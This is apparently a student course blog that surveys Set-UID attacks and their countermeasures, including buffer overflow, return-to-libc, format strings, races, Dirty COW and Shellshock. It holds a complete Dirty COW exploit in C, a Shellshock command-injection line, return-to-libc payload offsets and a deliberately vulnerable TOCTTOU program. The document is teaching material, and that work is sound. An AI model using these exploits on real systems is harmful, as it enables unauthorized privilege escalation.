Software Security - Overview

Writer information

This blog is a report for the Information Security course project, written by:

Nguyễn Nhật Minh Khôi - Student ID: 19120020 - Ho Chi Minh University of Science
Vũ Hữu Nghĩa - Student ID: 19120028 - Ho Chi Minh University of Science
Bạch Ngọc Minh Tâm - Student ID: 19120034 - Ho Chi Minh University of Science
Đỗ Nguyễn Duy Hoàng - Student ID: 19120077 - Ho Chi Minh University of Science

Introduction

Software security is a broad field that covers all vulnerabilities related to software, with common problems such as SQL injection, OS command injection and buffer overflow. Covering all of those topics in a single article is impossible. Here we focus on one object that often causes problems for our systems: the Set-UID program. We will learn how it can be exploited through buffer overflow, race conditions, format strings, Shellshock and similar attacks, and how to counter these attacks.

Note that this blog provides only an overview of each attack, so we discuss things at the concept level. We also provide a detailed article for each technique, so you can dive deeper as needed.

You can also find all demo videos here.

Set UID Program

So what is a set-uid program?

Things start with a question: "How do normal users change their password?". Changing a password requires modifying the password file in the OS, but normal users cannot modify this file. We cannot give normal users write permission to the password file, because they could then change other users' passwords. We also cannot give normal users write permission to specific lines only, because in most OSes the finest-grained permission is at the file level. Making access control more fine-grained would solve this problem, but it would significantly increase the complexity of the operating system.

To solve such problems, most operating systems use a simple two-tier design. The lower tier implements a simple and generic access control model at the file level. More complex, application-dependent access control is implemented at the higher tier in the form of privileged programs.

A set-uid program is one kind of privileged program. Instead of giving users a privileged permission and letting them do things manually, we write a program that performs the task automatically with privileged permission, and normal users can still execute it. In Linux, set-uid programs are implemented by separating the effective user ID and the real user ID of a process. The real user ID identifies the user running the process. The effective user ID is the ID used in access control, i.e. it determines what privileges the process has. For a normal program, the real user ID and the effective user ID are the same. When a program marked as set-uid (its set-uid bit turned on with the chmod command) is executed, the effective user ID is set to the ID of the program's owner. It is not the ID of the user executing the program (the real user ID).

For example, if I have a program named prog, I run these two commands to make prog a root set-uid program:

$ sudo chown root prog # change the owner of the program to root
$ sudo chmod 4755 prog # the leading 4 turns on the set-uid bit of the program

Where does the attack happen?

In principle, the set-uid mechanism is secure. The vulnerability lies in how programmers implement set-uid programs: without careful logic, a malicious user can make the program go wrong and harm the system. Attacks happen on two surfaces. The first is the input of the set-uid program, which includes explicit user input, system input that the user can control, and environment variables. The second is capability leaking, where a set-uid program passes its privileged capabilities to non-privileged programs.

Environment variable

For more detailed explanation about environment variable attack, please go to this link.

What is an environment variable?

Environment variables are a set of dynamic name-value pairs stored inside a process, and they affect the process's behaviour. For example, when a shell runs a program whose full path is not specified, it uses an environment variable named PATH to find where the program is.

But where does a process get its environment variables? A process initially gets them in one of two ways:

If a process is newly created (fork() in C), the child process inherits all environment variables of the parent, because its memory is duplicated from the parent's memory.
If a process runs a new program itself (execve() in C), its current memory is overwritten. All of its previous environment variables are lost unless they are explicitly passed to the new program through the envp argument of execve().

How does the attack happen?

In an attack, environment variables usually act as hidden inputs to a set-uid program. They are dangerous because developers are often unaware that their program uses them. As a result, these inputs are often not sanitized, and they can change the behavior of the program.

We can categorize the attack surface of environment variables into two main categories:

Linker: A linker finds the external library functions used by a program. In most operating systems, the linker uses environment variables to find where the libraries are. A malicious user can exploit this to make a privileged program "find" their malicious library before the library the developer intended.
Application: on this surface, problems come from the implementation of the application. These problems fall into three types: library, external program and application code.
- Library: some external libraries are not developed for privileged programs and may not sanitize environment variables properly. Attackers can then act through the environment variables these library functions use.
- External program: When a program invokes external programs for certain functions, such as sending emails or processing data, the external program runs with the calling process's privilege. The external program may use environment variables that the caller does not use, which expands the attack surface.
- Application code: when a program uses environment variables itself, misunderstanding how these variables get into the program may lead to incorrect sanitization.

Countermeasures

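To reduce the vulnerability of environment variables, there are some solutions:

Careful use of environment variables: never trust the content of environment variables, whether they are used explicitly or implicitly. Always remove or sanitize them before using them in a privileged program.
Use the service approach: unlike the set-uid approach, the service approach has normal users request a privileged service (e.g., a daemon) to perform the privileged operation on their behalf. The system starts the service, not the user, so the user does not control its environment variables. This greatly reduces this attack surface.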

Shellcode

A detailed explanation, along with experiments and demonstrations, can be found here.

What is shellcode?

Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine.

One of the most common uses of shellcode is in buffer overflow attacks, which exploit security holes in an application.

How to write a shellcode

In an exploit, shellcode usually appears as just a string of copied-and-pasted bytes. These bytes are architecture-specific machine instructions, so shellcode is written in assembly language.

The hardest part of writing good shellcode is that it must not contain any null bytes. Shellcode is often injected into a process as a string using functions like strcpy(), which stop copying at the first null byte. Null bytes come from:

Zero value (0)
End of the string ('\0')
NULL value of a pointer
High bytes of small positive integers (e.g. 0x00000069)

To obtain a zero value, we can xor a register with itself, which is the most common approach in shellcode. To obtain a small positive 32-bit integer, we can use one of the following ways:

Load a register with a 32-bit integer that contains no null bytes (e.g. 0x69123456), then shift the register left (shl) or right (shr) by the right amount.
Obtain a zero value, then set one of the register's 8-bit parts: ah, bh, ch, dh (bits 8 to 15) or al, bl, cl, dl (bits 0 to 7).

Buffer Overflow

A detailed explanation, along with experiments and demonstrations, can be found here.

What is buffer overflow (BOF)?

In a nutshell, a buffer overflow happens when a large piece of data is copied into a smaller buffer that cannot hold all of it, so the excess data overwrites adjacent memory. The main goal of BOF exploitation is to gain control over a function's return address (RA) and so alter the flow of the program directly. The program can then run malicious code injected by the attacker, or a sequence of existing system functions (see return-to-libc). Either way, the attacker can gain control over the host machine.

How it works

A program's memory consists of three main parts: the code/data segments, the heap and the stack. The stack stores local variables, function arguments and return addresses, among other things. Local variables include primitive-typed variables (int, double, ...), character arrays holding null-terminated strings, and other arrays (int a[5], double b[6], ...). Buffer overflow mainly happens in programs written in C/C++, because C does not bounds-check arrays and strings. With a pointer to an array or string, one can access any stack location after it. For example, int a[5] = {0}; printf("%d", a[6]); compiles without complaint, even though it is undefined behavior. Memory-related functions such as strcpy(), strcat(), gets() or scanf("%s", ...) cannot tell whether the destination buffer is large enough to hold the source. If the source data is long enough, the attacker can use this to overwrite memory on the stack. The main target is the return address, which sits right above the saved frame pointer, and overwriting it gives the attacker total control of the program flow.

Countermeasures

Address Space Layout Randomization (ASLR) randomizes the address space of a program each time it runs. In a 32-bit program, it can be brute-forced given enough time. In a 64-bit program, brute force takes too long to be worthwhile.
StackGuard was first implemented as a patch to GCC 2.x. It places a guard value (a canary) between local buffers and the return address and checks that value before the function returns. It is flawed, but under the right circumstances it can stop BOF exploitation. Later implementations, such as GCC's -fstack-protector, sought to fix the flaws of the original StackGuard. Stack protection is not enabled by default in upstream GCC/G++, although many Linux distributions enable it by default.
Non-executable stack protection marks the stack as non-executable, so code injected onto the stack by the attacker cannot run. Because it does not prevent the overflow itself, this countermeasure can be bypassed in many ways. One of them is return-to-libc.

Return to libc

For more detailed explanation about return-to-libc attack, please go to this link.

The vulnerability in built-in library

In the previous section, we saw that a buffer overflow attack can make a program jump to shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable. Jumping to the shellcode then makes the program crash instead.

Unfortunately, this protection scheme is not fool-proof. There is another type of attack, the return-to-libc attack, which does not need an executable stack and does not use shellcode at all. Instead, it makes the vulnerable program jump to existing code that is already loaded into memory, such as the system() function in the libc library.

How the attack happen?

There is a region in the memory where plenty of code can be found. It is the region for the standard C library functions. In Linux, the library is called libc, which is a dynamic link library. Most programs use the functions inside the libc library, so before these programs start running, the operating system will load the libc library into memory.

So which functions in libc can help an attacker reach their goal? Several exist, and the easiest one to use is system(). The system() function invokes a new shell and has that shell execute the string argument passed to it. So we only need to pass the string "/bin/sh" to system(), and it spawns a new shell that runs with the privileges of the set-uid program. Besides system(), many other functions can harm our system, such as execv() and setuid().

Implementing this attack is harder than the idea suggests. First, we need to know where the return address (often called RA) is relative to our buffer, so that we can overwrite it. In C, we can find this by debugging the program and printing the addresses of the ebp register and of the buffer. Next, we need a solid understanding of how the stack and the stack pointers change when a function is called (function prologue) or returns (function epilogue). Only then do we know exactly where to place the argument of our malicious function; in our case, this is "/bin/sh", the first argument of system(). The last step is to find the address of that argument. For example, we can use the shell's export command to create a new environment variable containing the desired value ("/bin/sh" in our case). Environment variables are loaded into the memory of the vulnerable process, so the string will be at a fixed location there.
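As a worked example of this offset calculation, assume a 32-bit x86 program whose vulnerable function uses the standard push ebp; mov ebp, esp prologue. Let B be the address of the buffer and E the value of ebp inside that function, both read from the debugger. After the epilogue (leave; ret) pops the overwritten return address, esp points at E + 8. When system() starts, it therefore treats the word at E + 8 as its own return address and the word at E + 12 as its first argument. Counted from the start of the buffer, the three slots of the payload are:

$$
\begin{aligned}
\text{offset}_{\text{system()}} &= (E - B) + 4 \\
\text{offset}_{\text{return address of system()}} &= (E - B) + 8 \\
\text{offset}_{\text{address of "/bin/sh"}} &= (E - B) + 12
\end{aligned}
$$

For instance, with a hypothetical distance E - B = 108 bytes, the address of system() goes at offset 112, the word at offset 116 becomes system()'s return address (commonly set to the address of exit()), and the address of "/bin/sh" goes at offset 120. These numbers depend on the assumed frame layout and should be checked in the debugger.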

Countermeasures

As with the shellcode-injection version of the buffer overflow attack, there are some countermeasures against return-to-libc:

Address Space Layout Randomization (ASLR) and StackGuard, which were described in the previous section.
"ASCII armoring" is a technique that can obstruct this kind of attack. With ASCII armoring, the addresses of all system libraries (e.g., libc) contain a NULL byte (0x00). This is commonly done by placing them in the first 0x01010101 bytes of memory (a few pages more than 16 MB, dubbed the "ASCII armor region"), because every address below this value contains at least one NULL byte. This makes it impossible to inject a payload containing those addresses through string functions such as strcpy(), which stop at the first NULL byte.

Format string

A detailed explanation, along with experiments and demonstrations, can be found here.

What is Format String Attack?

The format string attack is an exploit in which an attacker reads the program's memory, alters memory, or even runs malicious code. It is possible because of careless use of uncontrolled format strings in the printf family of functions.

How it works

A format string is a template for program output. It consists of ordinary text and format specifiers that act as placeholders and tell the program how to interpret and print the requested data. For example, I am %d years old is a format string containing the format specifier %d. This specifier tells the program to interpret the next argument (4 bytes on 32-bit x86) as a signed int, which is then converted into a string and printed.

The printf function takes a format string as its first argument, and all arguments after it are the data the programmer wants printed. If a pointer to a non-literal null-terminated string is passed as the first argument, printf still interprets that string as a format string. The function goes through the string character by character and outputs every character that is not part of a format specifier. Each time it meets a format specifier, its argument pointer, which starts at the format string argument, moves to the next argument. This happens even if no further arguments were passed, or if there are fewer arguments than format specifiers. In that case the function reads uncontrolled stack locations and interprets them as if they were real arguments.

This is dangerous in two ways. First, the attacker can read stack memory they are not supposed to see, which can contain sensitive data. Second, some format specifiers, notably %n, write to memory instead of reading from it. With them, the attacker can overwrite a function's return address, which, as we know, gives the attacker total control of the program flow.

Countermeasures

The countermeasures mentioned for BOF can also protect a program from format string attacks to some extent. Still, the best way to avoid this vulnerability is to always hard-code the format string, like this

printf("%s",s);

instead of this

printf(s);

especially when one wants to print a string variable.

Race condition

A detailed explanation, along with experiments and demonstrations, can be found here.

What is Race condition?

A race condition occurs when two or more threads can access shared data and they try to change it at the same time. Because the thread scheduling algorithm can swap between threads at any time, you don't know the order in which the threads will attempt to access the shared data. Therefore, the result of the change in data is dependent on the thread scheduling algorithm, i.e. both threads are "racing" to access/change the data.

What is symlink race?

A symlink race is a kind of software security vulnerability based on race conditions that result from a program creating files in an insecure manner. A malicious user can create a symbolic link to a file not otherwise accessible to them. When the privileged program creates a file of the same name as the symbolic link, it makes the linked-to file instead, possibly inserting content desired by the malicious user or even provided by the malicious user (as input to the program).

How it works?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    char* fn = "/tmp/XYZ";
    char buffer[60];
    FILE* fp;

    /* get user input */
    scanf("%50s", buffer);

    if (!access(fn, W_OK)) {
        // window of vulnerability: /tmp/XYZ can be re-pointed between access() and fopen()
        fp = fopen(fn, "a+");
        if (!fp) {
            perror("Open failed");
            exit(1);
        }
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    } else {
        printf("No permission \n");
    }

    return 0;
}

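The file name "/tmp/XYZ" is hardcoded in the program, but an attacker can use a symbolic link to change what this name refers to.
access(fn, W_OK) checks permission using the real user ID. The check passes while /tmp/XYZ points to a file the attacker may write to. Right after the check, the attacker re-points the symbolic link /tmp/XYZ to another file, such as a protected system file.
Because the check has already passed, fopen() runs with the program's root effective user ID and opens whatever file the link points to at that moment, even if the user has no permission to write to it.
The link must be changed in the short window after the check and before fopen(), so this is called a race condition, specifically a time-of-check to time-of-use (TOCTTOU) race.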

Countermeasure

Applying the Principle of Least Privilege
If a program does not need a certain privilege, that privilege should be disabled.
Here we can temporarily drop privilege with seteuid() and let fopen() itself do the permission check, by testing the file pointer it returns instead of calling access() first.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    char* fn = "/tmp/XYZ";
    char buffer[60];
    FILE* fp;
    uid_t real_uid = getuid();
    uid_t eff_uid = geteuid();

    /* get user input */
    if (scanf("%50s", buffer) != 1)
        return 1;

    // Switch to the user's real UID to limit root privilege
    if (seteuid(real_uid) != 0) {
        perror("seteuid");
        exit(1);
    }
    fp = fopen(fn, "a+");
    if (fp) { // Check the opened file pointer directly instead of calling access()
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    } else {
        printf("No permission \n");
    }
    seteuid(eff_uid); // Restore the original effective UID
    return 0;
}

Dirty COW

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affected all Linux-based operating systems, including Android devices, that used older versions of the Linux kernel created before 2018.
It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. Computers and devices that still use the older kernels remain vulnerable.

This is the sample exploit code:

#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
void *map;
void *writeThread(void *arg);
void *madviseThread(void *arg);

int main(int argc, char *argv[])
{
  pthread_t pth1,pth2;
  struct stat st;
  int file_size;

  // Open the target file in the read-only mode.
  int f=open("/zzz", O_RDONLY);

  // Map the file to COW memory using MAP_PRIVATE.
  fstat(f, &st);
  file_size = st.st_size;
  map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);
  // Find the position of the target area
  char *position = strstr(map, "222222");
  // We have to do the attack using two threads.
  pthread_create(&pth1, NULL, madviseThread, (void *)(intptr_t)file_size);
  pthread_create(&pth2, NULL, writeThread, position);
  // Both threads loop forever; stop the program (e.g. Ctrl+C) once the file has changed.
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}
void *writeThread(void *arg)
{
  char *content= "******";
  // /proc/self/mem is indexed by virtual address, so the target pointer is the offset.
  off_t offset = (off_t)(intptr_t) arg;

  int f=open("/proc/self/mem", O_RDWR);
  while(1) {
    // Move the file pointer to the corresponding position.
    lseek(f, offset, SEEK_SET);
    // Write to the memory.
    write(f, content, strlen(content));
  }
}
void *madviseThread(void *arg)
{
  int file_size = (int)(intptr_t) arg;
  while(1){
      // Discard the private copy of the mapped pages.
      madvise(map, file_size, MADV_DONTNEED);
  }
}

The original flaw, CVE-2016-5195, was patched in October 2016. On November 27, 2017, a revised patch for a related variant was released, before that vulnerability was publicly disclosed.

Shellshock

A detailed explanation, along with experiments and demonstrations, can be found here.

What is Shellshock?

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

The bug lies in a C file of the bash source code.

Shellshock bug

The Shellshock bug starts in the variable.c file of the bash source code. When the value of an environment variable starts with the characters () {, bash treats it as a function definition and parses it, but the parsing contains a mistake. This is the relevant code in variable.c:

/* Initialize the shell variables from the current environment.
   If PRIVMODE is nonzero, don't import functions from ENV or
   parse $SHELLOPTS. */
void initialize_shell_variables (env, privmode)
     char **env;
     int privmode;
{
  [...]
  for (string_index = 0; string = env[string_index++]; )
    {

      [...]
      /* If exported function, define it now.  Don't import functions from
     the environment in privileged mode. */
      if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
      {
        [...]
        parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
        [...]
      }
}

A for loop goes through all environment variables. For each one that looks like an exported function (its value starts with "() {"), bash replaces the '=' between the name and the value with a space, turning it into a function definition. It then calls parse_and_execute() to parse that definition. Source code for this function can be found here. However, parse_and_execute() does not stop at the function definition: it also parses and executes any shell commands that follow it:

If the string contains only a function definition, the parsing function just parses it, defining the function.
If the string contains a function definition followed by a shell command, the parsing function also executes that command.
If the string contains multiple commands separated by ;, the parsing function executes all of them.

$ foo='() { echo "Hello world" ; }; echo "extra";'
$ export foo
$ bash
extra    # the second command is executed (vulnerable bash only)

(child) $ declare -f foo
foo ()
{
    echo "Hello world"
}

The idea of the Shellshock attack is therefore to take a function definition and append extra commands chosen by the attacker. The result is passed to bash through an environment variable. Because bash hands the whole string to parse_and_execute(), the target runs the attacker's commands.

The conditions for exploiting the Shellshock vulnerability in bash:

The target must run bash.
The target must receive some environment variables from an outside source that the attacker controls.

Countermeasure

Update bash to the latest version.
Use an IDS/IPS to monitor network communication: it can alert you when a connection is established and remote commands are executed.
Use a web application firewall with a signature that monitors request headers and the POST/GET fields for the vulnerability. CGI (Common Gateway Interface) scripts are the most exposed, because the web server passes request data to them through environment variables, and many of them run through Bash. The signature should also catch attempts to bypass detection with extra or missing whitespace, e.g. (){ instead of () {.

Conclusion

In the end, the set-uid mechanism itself is secure; software goes wrong because of our misunderstandings when using it. Programmers must always be careful when implementing set-uid programs, and users must keep their programs updated to the newest version to get fixes for security bugs.
